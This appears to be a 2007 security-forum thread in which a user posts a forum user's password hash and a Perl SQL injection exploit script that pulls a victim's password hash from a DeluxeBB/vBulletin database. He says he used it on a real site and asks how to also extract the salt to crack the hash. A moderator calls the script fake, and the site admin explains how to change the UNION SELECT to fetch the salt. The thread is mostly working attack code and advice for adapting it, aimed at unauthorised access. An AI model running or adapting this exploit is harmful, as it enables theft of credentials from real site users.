 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
I need help decrypting this hash. |
 |
 Posted: Wed Nov 28, 2007 11:14 pm |
 |
|
| MaXe |
| Beginner |
 |
|
| Joined: Nov 29, 2007 |
| Posts: 3 |
|
|
|
 |
|
 |
|
This hash is from a vbulletin 3.6.8 ..
a4e0affa117a1eea993ddc91d148666e
Yes i know there's a salt, so to ask for a little more help here is the used script. (And yes it worked fine as apparently it dropped the md5 hash, the problem is now i want it to drop the Salt as well so i can try crack it, but since the SQL injection request confuses me i need help with that.)
PS: I think it's the 6th or 7th column from the last in the MySQL database which is the Salt. (if you take it as in the Injection, i could be wrong though).
I hope anyone can help me 
| Code: | #!/usr/bin/perl
use IO::Socket;
print q{
######################################################
# DeluxeBB Remote SQL Injection Exploit
#
# vbulletin Remote SQL Injection Exploit #
# // SekoMirza // Turkish Hackerz #
######################################################
};
if (!$ARGV[2]) {
print q{
Usage: perl dbbxpl.pl host /directory/ victim_userid
perl dbbxpl.pl www.somesite.com /forum/ 1
};
}
$server = $ARGV[0];
$dir = $ARGV[1];
$user = $ARGV[2];
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid =
$ARGV[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] SERVER: $server\r\n";
print "[>] DIR: $dir\r\n";
print
"[>] USERID: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path
.=
"misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM%20deluxebb_users%
20WHERE%20(uid='".$user ;
print
"[~] PREPARE TO CONNECT...\r\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";
print
"[+] CONNECTED\r\n";
print "[~] SENDING QUERY...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print
$socket "Connection: close\r\n\r\n";
print "[+] DONE!\r\n\r\n";
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";
while
($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "Password Hash is: ".$1."\r\n";
print "---------------------------------------------------------------------
-----------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
#########################################################
#Shoutz: #
#
#
# My Sweet -> Caramel #
# For Mp3s -> Hypn0sis #
# For Support -> [WwW.StarHack.Org] #
# My Bro ->
PhantomOrchid #
# My Preceptor -> Earnk Kazno #
#########################################################
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Nov 29, 2007 3:47 am |
|
|
| Sm0ke |
| Moderator |
 |
|
| Joined: Nov 25, 2006 |
| Posts: 141 |
| Location: Finland |
|
|
|
|
|
|
fake exploit, 
dont even try to get salt whit that its fake |
|
|
|
|
| Posted: Thu Nov 29, 2007 12:01 pm |
|
|
| MaXe |
| Beginner |
|
|
| Joined: Nov 29, 2007 |
| Posts: 3 |
|
|
|
|
|
|
|
What part of the code says it's fake? I can't see how it should be fake, as
i tried editing my cookies on the victim site and then the admin shutted the
site down and then he changed his pass as it spitted out a new hash. |
|
|
|
|
| Posted: Thu Nov 29, 2007 4:02 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
It all depends from sql table field name. If it's 'salt', then just make easy replace:
| Code: |
UNION+SELECT+0,pass,0
|
with
| Code: |
UNION+SELECT+0,salt,0
|
But you need to modify that script a little bit more, so that filter regex will match the answer. |
|
|
|
|
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 80
Members: 0
Total: 80
